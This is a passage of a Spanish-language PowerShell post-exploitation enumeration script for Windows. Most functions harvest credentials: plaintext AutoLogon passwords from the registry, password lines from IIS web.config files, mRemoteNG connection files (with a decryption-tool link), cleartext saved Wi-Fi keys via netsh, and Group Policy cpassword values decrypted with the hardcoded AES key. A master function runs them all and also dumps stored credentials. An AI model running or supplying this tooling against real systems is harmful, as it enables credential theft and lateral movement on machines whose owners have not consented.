942function Get-DriversInstalados { Get-WmiObject Win32_PnPSignedDriver| Where-Object {$_.DriverProviderName -notlike "Microsoft" -and $_.devicename -ne $null} | select devicename, driverversion}
943function Obtenemos-Servicios {
944Start-Job -ScriptBlock { Get-ItemProperty "registry::HKLM\SYSTEM\CurrentControlSet\services\*" | Where-Object {$_.imagePath -notlike "*system32*" -and $_.imagepath -ne $null -and $_.imagepath -notlike '*"*' } |Select-Object PSChildName,ImagePath | Format-Table} | Wait-Job | Receive-Job
945}
946function get-autologon {
947$resultado = Get-ItemProperty "registry::HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon" | Select-Object AutoAdminLogon, DefaultUserName, DefaultPassword, DefaultDomainName
948
949if (($resultado.DefaultPassword).count -ge "1") {Write-Host "`n[+] ================================== Encontradas Credenciales en AutoLogon ==================================`n";$resultado} else {Write-Host "`n[+] ================================== No se han encontrado datos en AutoLogon ==================================`n"}
950
951
952}
953function buscarCadena([String]$cadena , [String]$file) {
954 if ((Test-Path -Path $file) -and $cadena) {
955 $list = Get-Content $file
956 if ($list -match $cadena) {
957 return $true
958 }
959 }
960 return $false
961}
962function Get-Webconfig {
963[array]$webconfigs = (ls c:\inetpub -Recurse -Force -ErrorAction SilentlyContinue | Where-Object {$_.FullName -like "*web.config"} | Select-Object fullname).fullname
964foreach ($webconfig in $webconfigs) {
965if ((buscarCadena -cadena "pass" -file $webconfig) -eq $true) {
966$ErrorActionPreference = "SilentlyContinue"
967Write-Host "`n[+] ================================== Posible Password ==================================`n"
968Write-Host "[+] Archivo : $webconfig `n"
969Write-Host "[+] Contenido : `n"
970gc $webconfig
971
972}
973
974} }
975function Get-Mremote {
976
977[array]$full_user = (ls c:\users\ | Select-Object fullname).fullname
978foreach ($usuario in $full_user) {
979if ( (test-path "$usuario\appdata\Roaming\mRemoteNG") -eq $true ) {
980Write-Host "`n[+] ================================== Encontrada configuracion de mRemoteNG ==================================`n"
981Write-Host "[+] $usuario\appdata\Roaming\mRemoteNG`n"
982(ls $usuario\appdata\Roaming\mRemoteNG).FullName
983Write-Host "`n[+] Herramienta para descifrar `nhttps://github.com/kmahyyg/mremoteng-decrypt"
984
985} else {}
986
987}
988}
989function Get-Software {
990ls HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | ForEach-Object -Process {$_.getvalue("DisplayName")}
991
992
993}
994function Find-EventCommand {param($string) if ($string -eq $null) {$comandos = (get-WinEvent -FilterHashtable @{LogName = 'Security'} | Select-Object @{name='NewProcessName';expression={ $_.Properties[5].Value }}, @{name='CommandLine';expression={ $_.Properties[8].Value }}).commandline ; $comandos | Out-File $env:temp"\salida.txt" ; $comandos = gc $env:temp"\salida.txt"; $comandos} else {$comandos = (get-WinEvent -FilterHashtable @{LogName = 'Security'} | Select-Object @{name='NewProcessName';expression={ $_.Properties[5].Value }}, @{name='CommandLine';expression={ $_.Properties[8].Value }}).commandline ; $comandos | Out-File $env:temp"\salida.txt" ; $comandos = gc $env:temp"\salida.txt"; $comandos | Select-String $string }}
995function Wifi-Password {
996
997if ((Get-WinUserLanguageList)[0].LanguageTag -eq "es-Es"){
998Start-Job -ScriptBlock {(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=$name key=clear)} | Select-String "Contenido de la clave\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize | Out-File $env:temp\wifi.txt} | Wait-Job | Receive-Job
999}
1000else{
1001Start-Job -ScriptBlock {(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=$name key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize | Out-File $env:temp\wifi.txt} | Wait-Job | Receive-Job
1002}
1003if ((gc $env:temp\wifi.txt).count -ge 1) {
1004write-host "`n[+] ================================== Wifi Passwords =================================="
1005gc $env:temp\wifi.txt
1006Remove-Item $env:temp\wifi.txt -ea SilentlyContinue
1007
1008
1009}}
1010function Espera-Proceso {param($proceso)
1011do {sleep -Seconds 2}
1012while ((get-process $proceso -ErrorAction SilentlyContinue).count -ge 1)
1013
1014}
1015function Get-DecryptedCpassword {
1016 [CmdletBinding()]
1017 Param (
1018 [string] $Cpassword
1019 )
1020
1021 try {
1022
1023 $Mod = ($Cpassword.length % 4)
1024
1025 switch ($Mod) {
1026 '1' {$Cpassword = $Cpassword.Substring(0,$Cpassword.Length -1)}
1027 '2' {$Cpassword += ('=' * (4 - $Mod))}
1028 '3' {$Cpassword += ('=' * (4 - $Mod))}
1029 }
1030
1031 $Base64Decoded = [Convert]::FromBase64String($Cpassword)
1032
1033
1034 try
1035 {
1036 $AesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider -ErrorAction Stop
1037 }
1038 catch
1039 {
1040
1041 Write-Warning 'Unable to decrypt cPassword is .Net 3.5 installed?'
1042 return $Cpassword
1043 }
1044 [Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
1045 0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)
1046
1047
1048 $AesIV = New-Object Byte[]($AesObject.IV.Length)
1049 $AesObject.IV = $AesIV
1050 $AesObject.Key = $AesKey
1051 $DecryptorObject = $AesObject.CreateDecryptor()
1052 [Byte[]] $OutBlock = $DecryptorObject.TransformFinalBlock($Base64Decoded, 0, $Base64Decoded.length)
1053
1054 return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock)
1055 }
1056
1057 catch {Write-Error $Error[0]}
1058}
1059function Search-cpassword {
1060
1061
1062$path_sysvol = "\\" + (get-info).dominio + "\sysvol\" + (get-info).dominio + "\" + "policies" + "\*.xml"
1063$cpassword = findstr /S /I cpassword $path_sysvol; if ($cpassword -ne $null) {$archivo = ($cpassword -split ":")[0]; $cuenta = $cpassword.Length ; $cpassword = $cpassword.Split(" ")
1064if ($cuenta -ge 20) {
1065$username_cpassword = (($cpassword | Select-String "userName") -replace 'userName="','' -split '"')[0]
1066$pass_cpassword = ($cpassword | Select-String "cpassword") -replace 'cpassword="','' -replace '"',""
1067$password_texto_plano = Get-DecryptedCpassword -Cpassword $pass_cpassword
1068Write-Host "`n[+] ============================ Encontradas Credenciales Cpass ==================================`n"
1069Write-Host "[+] File = $archivo"
1070Write-Host "[+] Username = $username_cpassword"
1071Write-Host "[+] Password = $password_texto_plano"
1072} else {}
1073}
1074}
1075function Comprueba-Todo {
1076Write-Host $banner
1077Write-Host "`n[+] ================================== Informacion General del Sistema ==================================`n"
1078get-info
1079Write-Host "`n[+] ================================== Unidades del Sistema ==================================`n"
1080get-discosduros
1081Write-Host "`n[+] ================================== Privilegios del CurrentUser ==================================`n"
1082whoami /priv
1083Write-Host "`n[+] ================================== Usuarios Locales ==================================`n"
1084net user ; Espera-Proceso "net" ; sleep -Seconds 2
1085Write-Host "`n[+] ================================== Grupos Locales ==================================`n"
1086net localgroup | Select-String "\*" ; Espera-Proceso "net"
1087get-configRED
1088get-webconfig
1089Write-Host "`n[+] ================================== Software Instalado ==================================`n"
1090get-software
1091Write-Host "`n[+] ================================== Drivers de terceros ==================================`n"
1092get-driversinstalados
1093Write-Host "`n[+] ================================== Servicios sin Comillas =================================="
1094Obtenemos-Servicios
1095Wifi-Password
1096Search-cpassword
1097get-autologon ; sleep -Seconds 4
1098get-mremote
1099Write-Host "`n[+] ================================== Credenciales del sistema =================================="
1100credman -ShoCred | fl
1101get-config-firewall
1102}